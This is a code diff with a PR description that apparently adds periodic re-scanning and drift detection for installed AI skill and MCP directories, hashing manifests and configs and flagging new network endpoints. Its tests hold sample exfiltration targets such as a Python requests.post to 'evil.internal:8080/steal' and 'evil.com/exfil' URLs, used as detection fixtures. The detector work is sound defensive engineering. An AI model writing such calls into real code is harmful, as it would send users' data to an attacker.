+	err := w.store.InsertScanResult(
+		scanID, result.Scanner, result.Target, result.Timestamp,
+		result.Duration.Milliseconds(), len(result.Findings),
+		string(result.MaxSeverity()), string(raw),
+	)
+	if err != nil {
+		return ""
+	}
+	return scanID
+}

--- a/internal/watcher/rescan_test.go
+++ b/internal/watcher/rescan_test.go
@@ -1,0 +1,287 @@
+// Copyright 2026 Cisco Systems, Inc. and its affiliates
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package watcher
+
+import (
+	"encoding/json"
+	"testing"
+
+	"github.com/defenseclaw/defenseclaw/internal/audit"
+	"github.com/defenseclaw/defenseclaw/internal/scanner"
+)
+
+func TestCompareSnapshots_NoDrift(t *testing.T) {
+	baseline := &audit.SnapshotRow{
+		DependencyHashes: `{"requirements.txt":"abc123"}`,
+		ConfigHashes:     `{"skill.yaml":"def456"}`,
+		NetworkEndpoints: `["https://api.example.com"]`,
+	}
+	current := &TargetSnapshot{
+		DependencyHashes: map[string]string{"requirements.txt": "abc123"},
+		ConfigHashes:     map[string]string{"skill.yaml": "def456"},
+		NetworkEndpoints: []string{"https://api.example.com"},
+	}
+
+	deltas := compareSnapshots(baseline, current)
+	if len(deltas) != 0 {
+		t.Errorf("expected no drift, got %d deltas: %v", len(deltas), deltas)
+	}
+}
+
+func TestCompareSnapshots_DependencyChanged(t *testing.T) {
+	baseline := &audit.SnapshotRow{
+		DependencyHashes: `{"requirements.txt":"abc123"}`,
+		ConfigHashes:     `{}`,
+		NetworkEndpoints: `[]`,
+	}
+	current := &TargetSnapshot{
+		DependencyHashes: map[string]string{"requirements.txt": "changed"},
+		ConfigHashes:     map[string]string{},
+		NetworkEndpoints: []string{},
+	}
+
+	deltas := compareSnapshots(baseline, current)
+	if len(deltas) != 1 {
+		t.Fatalf("expected 1 delta, got %d", len(deltas))
+	}
+	if deltas[0].Type != DriftDependencyChange {
+		t.Errorf("expected dependency_change, got %s", deltas[0].Type)
+	}
+	if deltas[0].Severity != "MEDIUM" {
+		t.Errorf("expected MEDIUM severity, got %s", deltas[0].Severity)
+	}
+}
+
+func TestCompareSnapshots_NewDependency(t *testing.T) {
+	baseline := &audit.SnapshotRow{
+		DependencyHashes: `{}`,
+		ConfigHashes:     `{}`,
+		NetworkEndpoints: `[]`,
+	}
+	current := &TargetSnapshot{
+		DependencyHashes: map[string]string{"package.json": "new-hash"},
+		ConfigHashes:     map[string]string{},
+		NetworkEndpoints: []string{},
+	}
+
+	deltas := compareSnapshots(baseline, current)
+	if len(deltas) != 1 {
+		t.Fatalf("expected 1 delta, got %d", len(deltas))
+	}
+	if deltas[0].Type != DriftDependencyChange {
+		t.Errorf("expected dependency_change, got %s", deltas[0].Type)
+	}
+}
+
+func TestCompareSnapshots_ConfigMutated(t *testing.T) {
+	baseline := &audit.SnapshotRow{
+		DependencyHashes: `{}`,
+		ConfigHashes:     `{"skill.yaml":"old-hash"}`,
+		NetworkEndpoints: `[]`,
+	}
+	current := &TargetSnapshot{
+		DependencyHashes: map[string]string{},
+		ConfigHashes:     map[string]string{"skill.yaml": "new-hash"},
+		NetworkEndpoints: []string{},
+	}
+
+	deltas := compareSnapshots(baseline, current)
+	if len(deltas) != 1 {
+		t.Fatalf("expected 1 delta, got %d", len(deltas))
+	}
+	if deltas[0].Type != DriftConfigMutation {
+		t.Errorf("expected config_mutation, got %s", deltas[0].Type)
+	}
+	if deltas[0].Severity != "HIGH" {
+		t.Errorf("expected HIGH severity, got %s", deltas[0].Severity)
+	}
+}
+
+func TestCompareSnapshots_NewEndpoint(t *testing.T) {
+	baseline := &audit.SnapshotRow{
+		DependencyHashes: `{}`,
+		ConfigHashes:     `{}`,
+		NetworkEndpoints: `["https://api.safe.com"]`,
+	}
+	current := &TargetSnapshot{
+		DependencyHashes: map[string]string{},
+		ConfigHashes:     map[string]string{},
+		NetworkEndpoints: []string{"https://api.safe.com", "https://evil.com/exfil"},
+	}
+
+	deltas := compareSnapshots(baseline, current)
+	if len(deltas) != 1 {
+		t.Fatalf("expected 1 delta, got %d", len(deltas))
+	}
+	if deltas[0].Type != DriftNewEndpoint {
+		t.Errorf("expected new_endpoint, got %s", deltas[0].Type)
+	}
+	if deltas[0].Severity != "HIGH" {
+		t.Errorf("expected HIGH severity, got %s", deltas[0].Severity)
+	}
+}
+
+func TestCompareSnapshots_RemovedEndpoint(t *testing.T) {
+	baseline := &audit.SnapshotRow{
+		DependencyHashes: `{}`,
+		ConfigHashes:     `{}`,
+		NetworkEndpoints: `["https://api.old.com","https://api.safe.com"]`,
+	}
+	current := &TargetSnapshot{
+		DependencyHashes: map[string]string{},
+		ConfigHashes:     map[string]string{},
+		NetworkEndpoints: []string{"https://api.safe.com"},
+	}
+
+	deltas := compareSnapshots(baseline, current)
+	if len(deltas) != 1 {
+		t.Fatalf("expected 1 delta, got %d", len(deltas))
+	}
+	if deltas[0].Type != DriftRemovedEndpoint {
+		t.Errorf("expected removed_endpoint, got %s", deltas[0].Type)
+	}
+	if deltas[0].Severity != "INFO" {
+		t.Errorf("expected INFO severity, got %s", deltas[0].Severity)
+	}
+}
+
+func TestCompareSnapshots_MultipleDrifts(t *testing.T) {
+	baseline := &audit.SnapshotRow{
+		DependencyHashes: `{"requirements.txt":"old"}`,
+		ConfigHashes:     `{"config.yaml":"old"}`,
+		NetworkEndpoints: `[]`,
+	}
+	current := &TargetSnapshot{
+		DependencyHashes: map[string]string{"requirements.txt": "new"},
+		ConfigHashes:     map[string]string{"config.yaml": "new"},
+		NetworkEndpoints: []string{"https://new-endpoint.com"},
+	}
+
+	deltas := compareSnapshots(baseline, current)
+	if len(deltas) != 3 {
+		t.Errorf("expected 3 deltas, got %d: %+v", len(deltas), deltas)
+	}
+}
+
+func TestDiffFindings_NewFinding(t *testing.T) {
+	prev := []scanner.Finding{}
+	curr := []scanner.Finding{
+		{Title: "Hardcoded secret", Severity: "HIGH"},
+	}
+
+	deltas := diffFindings(prev, curr)
+	if len(deltas) != 1 {
+		t.Fatalf("expected 1 delta, got %d", len(deltas))
+	}
+	if deltas[0].Type != DriftNewFinding {
+		t.Errorf("expected new_finding, got %s", deltas[0].Type)
+	}
+	if deltas[0].Severity != "HIGH" {
+		t.Errorf("expected HIGH, got %s", deltas[0].Severity)
+	}
+}
+
+func TestDiffFindings_ResolvedFinding(t *testing.T) {
+	prev := []scanner.Finding{
+		{Title: "Hardcoded secret", Severity: "HIGH"},
+	}
+	curr := []scanner.Finding{}
+
+	deltas := diffFindings(prev, curr)
+	if len(deltas) != 1 {
+		t.Fatalf("expected 1 delta, got %d", len(deltas))
+	}
+	if deltas[0].Type != DriftRemovedFinding {
+		t.Errorf("expected resolved_finding, got %s", deltas[0].Type)
+	}
+	if deltas[0].Severity != "INFO" {
+		t.Errorf("expected INFO severity for resolved, got %s", deltas[0].Severity)
+	}
+}
+
+func TestDiffFindings_NoChange(t *testing.T) {
+	findings := []scanner.Finding{
+		{Title: "Secret A", Severity: "MEDIUM"},
+		{Title: "Secret B", Severity: "LOW"},
+	}
+
+	deltas := diffFindings(findings, findings)
+	if len(deltas) != 0 {
+		t.Errorf("expected no deltas, got %d", len(deltas))
+	}
+}
+
+func TestSeverityRank(t *testing.T) {
+	tests := []struct {
+		input    string
+		expected int
+	}{
+		{"CRITICAL", 5},
+		{"HIGH", 4},
+		{"MEDIUM", 3},
+		{"LOW", 2},
+		{"INFO", 1},
+		{"UNKNOWN", 0},
+		{"", 0},
+	}
+	for _, tt := range tests {
+		got := severityRank(tt.input)
+		if got != tt.expected {
+			t.Errorf("severityRank(%q) = %d, want %d", tt.input, got, tt.expected)
+		}
+	}
+}
+
+func TestSummarizeDrift(t *testing.T) {
+	deltas := []DriftDelta{
+		{Type: DriftNewFinding, Severity: "HIGH"},
+		{Type: DriftNewFinding, Severity: "MEDIUM"},
+		{Type: DriftDependencyChange, Severity: "MEDIUM"},
+		{Type: DriftConfigMutation, Severity: "HIGH"},
+	}
+
+	summary := summarizeDrift(deltas)
+	if summary == "" {
+		t.Error("expected non-empty summary")
+	}
+}
+
+func TestDriftDelta_JSONRoundtrip(t *testing.T) {
+	delta := DriftDelta{
+		Type:        DriftNewEndpoint,
+		Severity:    "HIGH",
+		Description: "new network endpoint detected: https://evil.com",
+		Current:     "https://evil.com",
+	}
+
+	data, err := json.Marshal(delta)
+	if err != nil {
+		t.Fatalf("marshal error: %v", err)
+	}
+
+	var decoded DriftDelta
+	if err := json.Unmarshal(data, &decoded); err != nil {
+		t.Fatalf("unmarshal error: %v", err)
+	}
+
+	if decoded.Type != delta.Type {
+		t.Errorf("type mismatch: %s != %s", decoded.Type, delta.Type)
+	}
+	if decoded.Severity != delta.Severity {
+		t.Errorf("severity mismatch: %s != %s", decoded.Severity, delta.Severity)
+	}
+}

--- a/internal/watcher/snapshot.go
+++ b/internal/watcher/snapshot.go
@@ -1,0 +1,205 @@
+// Copyright 2026 Cisco Systems, Inc. and its affiliates
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package watcher
+
+import (
+	"crypto/sha256"
+	"encoding/hex"
+	"io"
+	"os"
+	"path/filepath"
+	"regexp"
+	"sort"
+	"strings"
+	"time"
+)
+
+// TargetSnapshot captures the hashed state of a skill/MCP directory
+// for baseline comparison during periodic re-scans.
+type TargetSnapshot struct {
+	ContentHash      string            `json:"content_hash"`
+	DependencyHashes map[string]string `json:"dependency_hashes"`
+	ConfigHashes     map[string]string `json:"config_hashes"`
+	NetworkEndpoints []string          `json:"network_endpoints"`
+	Timestamp        time.Time         `json:"timestamp"`
+}
+
+var dependencyFiles = map[string]bool{
+	"requirements.txt": true,
+	"package.json":     true,
+	"package-lock.json": true,
+	"pyproject.toml":   true,
+	"go.mod":           true,
+	"go.sum":           true,
+	"Gemfile":          true,
+	"Gemfile.lock":     true,
+	"Cargo.toml":       true,
+	"Cargo.lock":       true,
+}
+
+var configFiles = map[string]bool{
+	"skill.yaml":    true,
+	"skill.yml":     true,
+	"mcp.json":      true,
+	"mcp.yaml":      true,
+	"config.yaml":   true,
+	"config.yml":    true,
+	"config.json":   true,
+	"manifest.json": true,
+	".env":          true,
+	".env.local":    true,
+}
+
+var codeExtensions = map[string]bool{
+	".py": true, ".js": true, ".ts": true, ".go": true, ".rb": true,
+	".java": true, ".rs": true, ".php": true, ".sh": true, ".bash": true,
+}
+
+// Matches http(s) URLs and common IP:port patterns in source code.
+var urlPattern = regexp.MustCompile(
+	`https?://[a-zA-Z0-9\-._~:/?#\[\]@!$&'()*+,;=%]+` +
+		`|` +
+		`\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}(?::\d{1,5})?\b`,
+)
+
+// Well-known non-actionable URL prefixes excluded from endpoint drift detection.
+var ignoredPrefixes = []string{
+	"http://localhost",
+	"https://localhost",
+	"http://127.0.0.1",
+	"https://127.0.0.1",
+	"http://example.com",
+	"https://example.com",
+	"http://0.0.0.0",
+}
+
+func isIgnoredEndpoint(url string) bool {
+	for _, prefix := range ignoredPrefixes {
+		if strings.HasPrefix(url, prefix) {
+			return true
+		}
+	}
+	return false
+}
+
+// SnapshotTarget walks a directory and captures hashed state for drift detection.
+func SnapshotTarget(root string) (*TargetSnapshot, error) {
+	snap := &TargetSnapshot{
+		DependencyHashes: make(map[string]string),
+		ConfigHashes:     make(map[string]string),
+		Timestamp:        time.Now().UTC(),
+	}
+
+	endpointSet := make(map[string]bool)
+	var allHashes []string
+
+	err := filepath.Walk(root, func(path string, info os.FileInfo, err error) error {
+		if err != nil {
+			return nil
+		}
+		if info.IsDir() {
+			base := info.Name()
+			if base == ".git" || base == "node_modules" || base == "__pycache__" || base == ".venv" || base == "venv" {
+				return filepath.SkipDir
+			}
+			return nil
+		}
+
+		rel, _ := filepath.Rel(root, path)
+		base := filepath.Base(path)
+		ext := strings.ToLower(filepath.Ext(path))
+
+		h, hashErr := hashFile(path)
+		if hashErr != nil {
+			return nil
+		}
+		allHashes = append(allHashes, rel+":"+h)
+
+		if dependencyFiles[base] {
+			snap.DependencyHashes[rel] = h
+		}
+		if configFiles[base] {
+			snap.ConfigHashes[rel] = h
+		}
+
+		if codeExtensions[ext] {
+			endpoints := extractEndpoints(path)
+			for _, ep := range endpoints {
+				endpointSet[ep] = true
+			}
+		}
+
+		return nil
+	})
+	if err != nil {
+		return nil, err
+	}
+
+	sort.Strings(allHashes)
+	overall := sha256.New()
+	for _, entry := range allHashes {
+		overall.Write([]byte(entry + "\n"))
+	}
+	snap.ContentHash = hex.EncodeToString(overall.Sum(nil))
+
+	snap.NetworkEndpoints = make([]string, 0, len(endpointSet))
+	for ep := range endpointSet {
+		snap.NetworkEndpoints = append(snap.NetworkEndpoints, ep)
+	}
+	sort.Strings(snap.NetworkEndpoints)
+
+	return snap, nil
+}
+
+func hashFile(path string) (string, error) {
+	f, err := os.Open(path)
+	if err != nil {
+		return "", err
+	}
+	defer f.Close()
+
+	h := sha256.New()
+	if _, err := io.Copy(h, f); err != nil {
+		return "", err
+	}
+	return hex.EncodeToString(h.Sum(nil)), nil
+}
+
+func extractEndpoints(path string) []string {
+	data, err := os.ReadFile(path)
+	if err != nil {
+		return nil
+	}
+
+	const maxScanSize = 512 * 1024
+	if len(data) > maxScanSize {
+		data = data[:maxScanSize]
+	}
+
+	matches := urlPattern.FindAllString(string(data), -1)
+	seen := make(map[string]bool)
+	var result []string
+	for _, m := range matches {
+		normalized := strings.TrimRight(m, ".,;:\"')")
+		if isIgnoredEndpoint(normalized) || seen[normalized] {
+			continue
+		}
+		seen[normalized] = true
+		result = append(result, normalized)
+	}
+	return result
+}

--- a/internal/watcher/snapshot_test.go
+++ b/internal/watcher/snapshot_test.go
@@ -1,0 +1,202 @@
+// Copyright 2026 Cisco Systems, Inc. and its affiliates
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package watcher
+
+import (
+	"os"
+	"path/filepath"
+	"testing"
+)
+
+func TestSnapshotTarget_Empty(t *testing.T) {
+	dir := t.TempDir()
+	snap, err := SnapshotTarget(dir)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if snap.ContentHash == "" {
+		t.Error("expected non-empty content hash for empty dir")
+	}
+	if len(snap.DependencyHashes) != 0 {
+		t.Errorf("expected no dependency hashes, got %d", len(snap.DependencyHashes))
+	}
+	if len(snap.ConfigHashes) != 0 {
+		t.Errorf("expected no config hashes, got %d", len(snap.ConfigHashes))
+	}
+	if len(snap.NetworkEndpoints) != 0 {
+		t.Errorf("expected no network endpoints, got %d", len(snap.NetworkEndpoints))
+	}
+}
+
+func TestSnapshotTarget_DetectsDeps(t *testing.T) {
+	dir := t.TempDir()
+	if err := os.WriteFile(filepath.Join(dir, "requirements.txt"), []byte("flask==3.0\n"), 0o600); err != nil {
+		t.Fatal(err)
+	}
+	if err := os.WriteFile(filepath.Join(dir, "package.json"), []byte(`{"name":"test"}`), 0o600); err != nil {
+		t.Fatal(err)
+	}
+
+	snap, err := SnapshotTarget(dir)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if len(snap.DependencyHashes) != 2 {
+		t.Errorf("expected 2 dependency hashes, got %d", len(snap.DependencyHashes))
+	}
+	if _, ok := snap.DependencyHashes["requirements.txt"]; !ok {
+		t.Error("expected requirements.txt in dependency hashes")
+	}
+	if _, ok := snap.DependencyHashes["package.json"]; !ok {
+		t.Error("expected package.json in dependency hashes")
+	}
+}
+
+func TestSnapshotTarget_DetectsConfig(t *testing.T) {
+	dir := t.TempDir()
+	if err := os.WriteFile(filepath.Join(dir, "skill.yaml"), []byte("name: test\n"), 0o600); err != nil {
+		t.Fatal(err)
+	}
+	if err := os.WriteFile(filepath.Join(dir, "config.json"), []byte("{}"), 0o600); err != nil {
+		t.Fatal(err)
+	}
+
+	snap, err := SnapshotTarget(dir)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if len(snap.ConfigHashes) != 2 {
+		t.Errorf("expected 2 config hashes, got %d", len(snap.ConfigHashes))
+	}
+}
+
+func TestSnapshotTarget_ExtractsEndpoints(t *testing.T) {
+	dir := t.TempDir()
+	code := `
+import requests
+r = requests.get("https://api.example.org/v1/data")
+r2 = requests.post("http://evil.internal:8080/steal")
+`
+	if err := os.WriteFile(filepath.Join(dir, "main.py"), []byte(code), 0o600); err != nil {
+		t.Fatal(err)
+	}
+
+	snap, err := SnapshotTarget(dir)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if len(snap.NetworkEndpoints) < 2 {
+		t.Errorf("expected at least 2 endpoints, got %d: %v", len(snap.NetworkEndpoints), snap.NetworkEndpoints)
+	}
+
+	found := make(map[string]bool)
+	for _, ep := range snap.NetworkEndpoints {
+		found[ep] = true
+	}
+	if !found["https://api.example.org/v1/data"] {
+		t.Error("expected https://api.example.org/v1/data in endpoints")
+	}
+	if !found["http://evil.internal:8080/steal"] {
+		t.Error("expected http://evil.internal:8080/steal in endpoints")
+	}
+}
+
+func TestSnapshotTarget_SkipsVenvDir(t *testing.T) {
+	dir := t.TempDir()
+	venvDir := filepath.Join(dir, ".venv")
+	if err := os.MkdirAll(venvDir, 0o700); err != nil {
+		t.Fatal(err)
+	}
+	if err := os.WriteFile(filepath.Join(venvDir, "pyvenv.cfg"), []byte("home = /usr/bin"), 0o600); err != nil {
+		t.Fatal(err)
+	}
+	if err := os.WriteFile(filepath.Join(dir, "main.py"), []byte("print('hello')"), 0o600); err != nil {
+		t.Fatal(err)
+	}
+
+	snap1, err := SnapshotTarget(dir)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	if err := os.WriteFile(filepath.Join(venvDir, "newfile"), []byte("changed"), 0o600); err != nil {
+		t.Fatal(err)
+	}
+
+	snap2, err := SnapshotTarget(dir)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	if snap1.ContentHash != snap2.ContentHash {
+		t.Error("content hash should not change when only .venv contents change")
+	}
+}
+
+func TestSnapshotTarget_DeterministicHash(t *testing.T) {
+	dir := t.TempDir()
+	if err := os.WriteFile(filepath.Join(dir, "a.py"), []byte("print(1)"), 0o600); err != nil {
+		t.Fatal(err)
+	}
+	if err := os.WriteFile(filepath.Join(dir, "b.py"), []byte("print(2)"), 0o600); err != nil {
+		t.Fatal(err)
+	}
+
+	snap1, _ := SnapshotTarget(dir)
+	snap2, _ := SnapshotTarget(dir)
+
+	if snap1.ContentHash != snap2.ContentHash {
+		t.Error("snapshot hashes should be deterministic")
+	}
+}
+
+func TestSnapshotTarget_ContentChangeAltersHash(t *testing.T) {
+	dir := t.TempDir()
+	if err := os.WriteFile(filepath.Join(dir, "main.py"), []byte("v1"), 0o600); err != nil {
+		t.Fatal(err)
+	}
+
+	snap1, _ := SnapshotTarget(dir)
+
+	if err := os.WriteFile(filepath.Join(dir, "main.py"), []byte("v2"), 0o600); err != nil {
+		t.Fatal(err)
+	}
+
+	snap2, _ := SnapshotTarget(dir)
+
+	if snap1.ContentHash == snap2.ContentHash {
+		t.Error("content hash should change when file content changes")
+	}
+}
+
+func TestSnapshotTarget_IgnoresLocalhost(t *testing.T) {
+	dir := t.TempDir()
+	code := `url = "http://localhost:3000/api"
+other = "https://evil.com/steal"
+`
+	if err := os.WriteFile(filepath.Join(dir, "app.js"), []byte(code), 0o600); err != nil {
+		t.Fatal(err)
+	}
+
+	snap, _ := SnapshotTarget(dir)
+
+	for _, ep := range snap.NetworkEndpoints {
+		if ep == "http://localhost" || ep == "http://localhost:3000/api" {
+			t.Errorf("localhost endpoints should be ignored, got: %s", ep)
+		}
+	}
+}

--- a/internal/watcher/watcher.go
+++ b/internal/watcher/watcher.go
@@ -158,6 +158,10 @@ func (w *InstallWatcher) Run(ctx context.Context) error {
 
 	_ = w.logger.LogAction("watch-start", "", fmt.Sprintf("dirs=%d debounce=%s", watched, w.debounce))
 
+	if w.cfg.Watch.RescanEnabled {
+		go w.rescanLoop(ctx)
+	}
+
 	ticker := time.NewTicker(w.debounce)
 	defer ticker.Stop()
 

--- a/policies/default.yaml
+++ b/policies/default.yaml
@@ -98,6 +98,10 @@ firewall:
     - 443
     - 80
 
+watch:
+  rescan_enabled: true
+  rescan_interval_min: 60
+
 enforcement:
   max_enforcement_delay_seconds: 2
 

--- a/policies/permissive.yaml
+++ b/policies/permissive.yaml
@@ -61,6 +61,10 @@ firewall:
   allowed_domains: []
   allowed_ports: []
 
+watch:
+  rescan_enabled: true
+  rescan_interval_min: 120
+
 enforcement:
   max_enforcement_delay_seconds: 5
 

--- a/policies/strict.yaml
+++ b/policies/strict.yaml
@@ -113,6 +113,10 @@ firewall:
   allowed_ports:
     - 443
 
+watch:
+  rescan_enabled: true
+  rescan_interval_min: 30
+
 enforcement:
   max_enforcement_delay_seconds: 1
 

--- a/schemas/audit-event.json
+++ b/schemas/audit-event.json
@@ -6,7 +6,7 @@
   "properties": {
     "id": { "type": "string", "format": "uuid" },
     "timestamp": { "type": "string", "format": "date-time" },
-    "action": { "type": "string", "enum": ["init", "scan", "block", "allow", "quarantine", "restore", "deploy", "stop"] },
+    "action": { "type": "string", "enum": ["init", "scan", "block", "allow", "quarantine", "restore", "deploy", "stop", "drift", "rescan"] },
     "target": { "type": "string" },
     "actor": { "type": "string", "default": "defenseclaw" },
     "details": { "type": "string" },


### PR DESCRIPTION
## Periodic Re-scan and Drift Detection

### Summary

- Adds a scheduled re-scan loop to the watcher that periodically walks all installed skill and MCP directories, snapshots their content (dependency manifests, config files, network endpoints), compares against the stored baseline, and emits structured drift alerts to the audit DB.
- Fixes audit store schema initialization on sidecar startup to ensure new tables are created when reusing an existing DB file.

### Motivation

The existing watcher is purely event-driven via fsnotify -- it only reacts to new directory creation. If an already-installed skill is mutated (dependencies updated, config changed, new network endpoints injected), the watcher is blind to it. This PR closes that gap by adding continuous integrity monitoring via periodic re-scans.

### What Changed

#### New Files

| File | Purpose |
|------|---------|
| `internal/watcher/snapshot.go` | `SnapshotTarget()` walks a skill/MCP directory and captures SHA-256 hashes of dependency manifests, config files, and extracts network endpoints from source code |
| `internal/watcher/rescan.go` | `rescanLoop()` goroutine, drift comparison (`compareSnapshots`, `diffFindings`), and `emitDriftAlerts` |
| `internal/watcher/snapshot_test.go` | 8 unit tests for snapshot hashing |
| `internal/watcher/rescan_test.go` | 13 unit tests for drift comparison logic |
| `internal/watcher/drift_e2e_test.go` | 2 integration tests for the full snapshot-store-mutate-detect pipeline |

#### Modified Files

| File | Change |
|------|--------|
| `internal/config/config.go` | Added `RescanEnabled` and `RescanIntervalMin` to `WatchConfig` (defaults: `true`, `60` min) |
| `internal/audit/store.go` | Added `target_snapshots` table, `SnapshotRow` struct, `SetTargetSnapshot()`, `GetTargetSnapshot()`, `GetScanRawJSON()` |
| `internal/watcher/watcher.go` | Wired `go w.rescanLoop(ctx)` into `Run()` when rescan is enabled |
| `internal/cli/root.go` | Added `auditStore.Init()` call to ensure schema is created on existing DBs |
| `policies/default.yaml` | Added `watch.rescan_interval_min: 60` |
| `policies/strict.yaml` | Added `watch.rescan_interval_min: 30` |
| `policies/permissive.yaml` | Added `watch.rescan_interval_min: 120` |
| `schemas/audit-event.json` | Extended action enum with `"drift"` and `"rescan"` |
| `cli/defenseclaw/models.py` | Added `TargetSnapshot` dataclass |
| `cli/defenseclaw/db.py` | Mirrored `target_snapshots` DDL, added `get_target_snapshot()` and `list_drift_events()` |

### Drift Detection Categories

| Category | How Detected | Severity |
|----------|-------------|----------|
| Dependency change | Hash of `requirements.txt` / `package.json` / `go.mod` etc. changed | MEDIUM |
| Config mutation | Hash of `skill.yaml` / `mcp.json` / `config.yaml` changed | HIGH |
| New network endpoint | URLs extracted from code not in baseline set | HIGH |
| Removed endpoint | URL in baseline but not in current scan | INFO |
| New finding | Finding title in current scan not in baseline | Matches finding severity |
| Resolved finding | Finding in baseline but not in current | INFO |
| Severity escalation | Max severity increased since baseline | New max severity |

### Architecture

```
Sidecar Startup
  ├── fsnotify loop (existing, event-driven)
  └── rescanLoop (new, periodic)
        ├── tick every rescan_interval
        ├── enumerate installed skills/MCPs
        ├── SnapshotTarget() → hash deps, configs, endpoints
        ├── compare with stored baseline
        ├── drift detected? → LogEvent(action="drift", severity, details JSON)
        └── update baseline snapshot
```

### Test Plan

- [x] 23 new unit tests pass (snapshot hashing, drift comparison, severity ranking, JSON roundtrip)
- [x] 2 integration tests pass (full pipeline: snapshot → store → mutate → detect → alert)
- [x] Full `go test ./...` passes with zero regressions
- [x] `go vet ./...` clean
- [x] `ruff check` clean on changed Python files
- [x] Live E2E: started sidecar, created test skill, waited for baseline, mutated skill (added deps + evil endpoint + config change), confirmed drift alert appeared in audit DB with correct severity and structured details
